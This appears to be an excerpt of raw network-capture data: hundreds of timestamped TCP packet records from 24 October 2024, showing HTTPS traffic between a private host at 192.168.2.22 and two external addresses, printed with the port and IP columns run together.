                                                                                    Oct 24, 2024 08:45:45.568348885 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.568419933 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.568434000 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.568461895 CEST443491725.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.568581104 CEST49172443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:45.570602894 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.570667028 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.570677042 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.571578979 CEST443491735.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.571638107 CEST49173443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:45.574150085 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.574203968 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.574212074 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.575414896 CEST49172443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:45.575421095 CEST443491725.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.576107979 CEST443491725.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.576174974 CEST49172443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:45.579794884 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.579881907 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.580019951 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.580037117 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.582077980 CEST49173443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:45.582098007 CEST443491735.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.582420111 CEST443491735.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.582477093 CEST49173443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:45.619898081 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.619997025 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.620007992 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.620039940 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.620095015 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.620105028 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.620230913 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.620280027 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.620287895 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.620393038 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.620440006 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.620446920 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.620537996 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.620580912 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.620590925 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.620677948 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.620718956 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.620726109 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.621006966 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.621071100 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.621079922 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.623838902 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.623898983 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.623914003 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.624026060 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.624070883 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.624078989 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.628855944 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.628935099 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.628936052 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.628964901 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.629123926 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.633876085 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.638545036 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.638573885 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.638622046 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.638637066 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.638690948 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.641824007 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.642277002 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.642328978 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.642332077 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.642343044 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.642391920 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.644530058 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.644603014 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.645262003 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.648077011 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.648101091 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.648138046 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.648169994 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.648220062 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.650712013 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.653753996 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.653786898 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.653845072 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.653876066 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.654042006 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.656636953 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.656677961 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.658036947 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.658050060 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.659473896 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.659526110 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.659535885 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.662552118 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.664289951 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.664303064 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.665235043 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.666024923 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.666034937 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.668018103 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.668068886 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.668078899 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.670984030 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.673666954 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.673731089 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.673757076 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.673841953 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.673891068 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.673899889 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.675252914 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.675390005 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.676479101 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.679265022 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.679299116 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.679354906 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.679363966 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.682029009 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.682059050 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.682111025 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.682120085 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.684904099 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.684969902 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.684983969 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.687463045 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.687549114 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.687607050 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.687623024 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.691293001 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.691617966 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.691632986 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.696894884 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.696984053 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.697043896 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.697058916 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.713350058 CEST49173443192.168.2.225.159.62.243
                                                                                    Oct 24, 2024 08:45:45.736852884 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.736913919 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.736942053 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.737036943 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.737086058 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.737103939 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.737210989 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.737308979 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.737353086 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.737364054 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.737473011 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.737518072 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.737529039 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.737626076 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.737683058 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.737690926 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.737937927 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.738019943 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.738023996 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.738048077 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.740786076 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.740839005 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.740859032 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.740979910 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.741082907 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.741127968 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.741137981 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.745918989 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.746032953 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.746052027 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.750830889 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.754030943 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.754049063 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.755331039 CEST443491735.159.62.243192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.755673885 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.755732059 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.755744934 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.758894920 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.761188984 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.761204004 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.761265993 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.761365891 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.762367010 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.762542963 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.762597084 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.762609959 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.765166998 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.766033888 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.766047955 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.768034935 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.768126011 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.768178940 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.768196106 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.770726919 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.770836115 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.770890951 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.770910025 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.773787022 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.773875952 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.773931026 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.773940086 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.776509047 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.776613951 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.776659966 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.776669025 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.779697895 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.782036066 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.782062054 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.782366991 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.785468102 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.785526037 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.785553932 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.787941933 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.788084030 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.788147926 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.788183928 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.790945053 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.791059017 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.791121006 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.791156054 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.793677092 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.794033051 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.794059992 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.796540976 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.798033953 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.798053026 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.799261093 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.799385071 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.799442053 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.799458027 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.802186966 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.804920912 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.804985046 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.805002928 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.805103064 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.805182934 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.805232048 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.805241108 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.819710016 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.819809914 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.819870949 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.819897890 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.854816914 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.854918957 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.855001926 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.855024099 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.855051994 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.855094910 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.855154037 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.855308056 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.855366945 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.855384111 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.855467081 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.855521917 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.855531931 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.855606079 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.855737925 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.855783939 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.855792999 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.855870962 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.855927944 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.855937004 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.856064081 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.856142998 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.856185913 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.856193066 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.857944965 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.858000040 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.858026028 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.858108997 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.858160019 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.858167887 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.862833977 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.862945080 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.862993002 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.863003016 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.867676973 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.870059013 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.870075941 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.872649908 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.872723103 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.872739077 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.878914118 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.879009008 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.879075050 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.879098892 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.879466057 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.879518032 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.879537106 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.884219885 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.884830952 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.884907007 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.884931087 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.885042906 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.885092020 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.885107040 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.885193110 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.886020899 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.886029005 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.887813091 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.890028000 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.890037060 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.890961885 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.891011953 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.891019106 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.891144991 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.891191006 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.891197920 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.893717051 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.896173954 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.896181107 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.896450996 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.896498919 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.896505117 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.899236917 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.899518967 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.899527073 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.902309895 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.902349949 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.902415991 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.902429104 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.904853106 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.905071974 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.905122042 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.907936096 CEST44349169142.250.186.97192.168.2.22
                                                                                    Oct 24, 2024 08:45:45.910020113 CEST49169443192.168.2.22142.250.186.97
                                                                                    Oct 24, 2024 08:45:45.910039902 CEST44349169142.250.186.97192.168.2.22
